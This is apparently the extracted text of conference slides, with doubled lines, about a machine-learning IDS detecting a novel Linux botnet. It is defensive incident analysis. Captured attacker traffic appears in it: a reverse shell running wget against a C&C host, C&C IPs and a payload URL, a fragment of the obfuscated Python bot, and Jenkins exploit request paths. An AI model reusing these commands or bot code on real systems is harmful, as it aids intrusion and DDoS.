Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet / SEBASTIAN GARCIA [ATG GROUP OF CTU]

1. 1 Robots againstRobots against robots: How arobots: How a Machine LearningMachine Learning IDS detected aIDS detected a novel Linux Botnetnovel Linux Botnet Sebastian GarciaSebastian Garcia @eldracote@eldracote sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz https://stratosphereips.orghttps://stratosphereips.org bit.ly/SS-RvRbit.ly/SS-RvR

2. 2 The DetectionThe Detection January 18th, 2016.January 18th, 2016. Testing Stratosphere IPS in the University network.Testing Stratosphere IPS in the University network. Have an alert from a malicious behavior in the IDS.Have an alert from a malicious behavior in the IDS. 147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H, "For a long time there was a periodic connection (freq"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of5s-60s), to an uncommon port, with large flows of medium duration."medium duration."

3. 3 The Analysis: VisibilityThe Analysis: Visibility Argus flow suite from Qosient.Argus flow suite from Qosient. Storage of 3,000 hosts continually (1 year ~= 80GB)Storage of 3,000 hosts continually (1 year ~= 80GB) Back in time!Back in time!

4. 4 The Detected ConnectionThe Detected Connection Sent: "+.............P.43.249.81.135.......?."Sent: "+.............P.43.249.81.135.......?." Recv: ".................................." (MBs)Recv: ".................................." (MBs) Recv once: "import time as O000OO0O0O00OO00O"Recv once: "import time as O000OO0O0O00OO00O" 43.249.81.13543.249.81.135 No VirusTotal detection.No VirusTotal detection. AS58879 Shanghai Anchang Network SecurityAS58879 Shanghai Anchang Network Security Technology Co.,L. China.Technology Co.,L. China. Last known domain: lyzqmir2.com. Minecraft server.Last known domain: lyzqmir2.com. Minecraft server.

5. 5 The Begining: Jan 16th, 2016The Begining: Jan 16th, 2016 103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP [VT:7][VT:7] S:"/bin/sh: 0: can't access tty; job control turned off.$,"S:"/bin/sh: 0: can't access tty; job control turned off.$," S:"S:"tomcat6tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$abcc.$ S:"wget 23.247.5.27:435/abcc.c"S:"wget 23.247.5.27:435/abcc.c" R:"ps aux |grep abcc.ccd /tmp.m"R:"ps aux |grep abcc.ccd /tmp.m" 23.247.5.2723.247.5.27 portport 435435/TCP/TCP [VT:0][VT:0] 23.247.5.2723.247.5.27 portport 2500025000/TCP (main CC)/TCP (main CC) "=...-== Love AV ==-:..Linux 3.2.0-4-amd64""=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

6. 6 The AnalysisThe Analysis 103.242.134.118103.242.134.118 portport 2303123031/TCP/TCP ""version:0.1"version:0.1" "heartOK","hearta""heartOK","hearta" "deployOK:115.239.248.88:80:3:60 heartOK""deployOK:115.239.248.88:80:3:60 heartOK" 103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP "http://222.179.116.23:8080/theme/1/pys.py""http://222.179.116.23:8080/theme/1/pys.py" Python script?Python script?

7. 7 Our computer Attacking?Our computer Attacking? Hundreds of connections to IPs in China, port 80/UDP.Hundreds of connections to IPs in China, port 80/UDP. 115.239.248.88115.239.248.88 portport 8080//UDPUDP [MoveInternet Network[MoveInternet Network Technology Co.,Ltd.,CN]Technology Co.,Ltd.,CN] Few Kb ofFew Kb of binarybinary data sent.data sent. Could not find a motive or explanation.Could not find a motive or explanation.

8. 8 The CompromiseThe Compromise What we knewWhat we knew Tomcat involved.Tomcat involved. Date range.Date range. We found strange POSTs to Jenkins minutes beforeWe found strange POSTs to Jenkins minutes before POST /jenkins/descriptor/hudson.model.DownloadService/byId/POST /jenkins/descriptor/hudson.model.DownloadService/byId/ hudson.tasks.Maven.MavenInstaller/postBackhudson.tasks.Maven.MavenInstaller/postBack POST /jenkins/ajaxExecutorsPOST /jenkins/ajaxExecutors Remote Jenkins code execution vulnerabilityRemote Jenkins code execution vulnerability . Metasploit module.. Metasploit module. CVE-CVE- 2015-81032015-8103

9. 9 The Python Botnet ScriptThe Python Botnet Script import time as O000OO0O0O00OO00O import math as O000O0OO0O0O00O0O import socket as OO0000OOOOOO0O000 import os as OO00000000OO000OO import base64 as O0O0OOOO00O0O00OO import threading as O00O000000OOO0OO0 import random as O0OOO0O000OO0O00O class fbiabcd8c (O00O000000OOO0OO0 .Thread ): def __init__ (O0000O0OOOOOOO0O0 ): O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 ) def run (O0OO0OOOOO000O000 ): global SvneciA global fn023ca global fABRVUqfh if (fn023ca ==False ): return O00O0O00000OOO0OO =0 while fABRVUqfh : O00O0O00000OOO0OO +=1 if (SvneciA >=O00O0O00000OOO0OO ): O000OO0O0O00OO00O .sleep (1 ) else : break fABRVUqfh =False try : FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))

10. 10 The Python Botnet ScriptThe Python Botnet Script Obfuscated. Deobfuscated by Veronica Valeros. Thx!Obfuscated. Deobfuscated by Veronica Valeros. Thx! Threads.Threads. C&C channel withC&C channel with 10s timeouts.10s timeouts. Receives orders and executes commands, includingReceives orders and executes commands, including access to OS.access to OS. Confuse analysts? or DDoS?Confuse analysts? or DDoS? Function to send random UDP data to IPs receivedFunction to send random UDP data to IPs received by C&C.by C&C.

11. 11 How Machine LearningHow Machine Learning detected this?detected this?

12. 12 Stratosphere IPSStratosphere IPS https://stratosphereips.org/https://stratosphereips.org/ FreeFree SoftwareSoftware MachineMachine LearningLearning BehavioralBehavioral IPSIPS ProtectingProtecting NGOsNGOs

13. 13 Stratosphere IPSStratosphere IPS Model network behaviors as a string ofModel network behaviors as a string of lettersletters.. 11 flowflow 33 featuresfeatures 11 letterletter

14. 14 Behavior of ConnectionsBehavior of Connections

15. 15 Markov Chains ModelsMarkov Chains Models Create, train and store a Markov Chain modelsCreate, train and store a Markov Chain models

16. 16 Behavioral DetectionBehavioral Detection TrainedTrained Markov ModelsMarkov Models Similarity toSimilarity to Unknown TrafficUnknown Traffic

17. 17 ConclusionConclusion Still unknown and hidden.Still unknown and hidden. CouldCould notnot be detected by usual protections.be detected by usual protections. No fingerprints, noNo fingerprints, no reputationsreputations, no rootkits., no rootkits. ContinuousContinuous VisibilityVisibility is paramount.is paramount. BehavioralBehavioral Machine Learning is improving.Machine Learning is improving.

18. 18 Questions? And Thanks!Questions? And Thanks! Sebastian GarciaSebastian Garcia sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz @eldracote@eldracote Workshop Malware Traffic:Workshop Malware Traffic: bit.lybit.ly/SSdirtywork/SSdirtywork

Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet / SEBASTIAN GARCIA [ATG GROUP OF CTU]

Du liest eine Vorschau.

Hier ansehen

Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet / SEBASTIAN GARCIA [ATG GROUP OF CTU]

Weitere Verwandte Inhalte

Diashows für Sie (20)

Ähnlich wie Robots against robots: How a Machine Learning IDS detected a novel Linux Botnet / SEBASTIAN GARCIA [ATG GROUP OF CTU] (20)

Weitere von Security Session (20)

Aktuellste (20)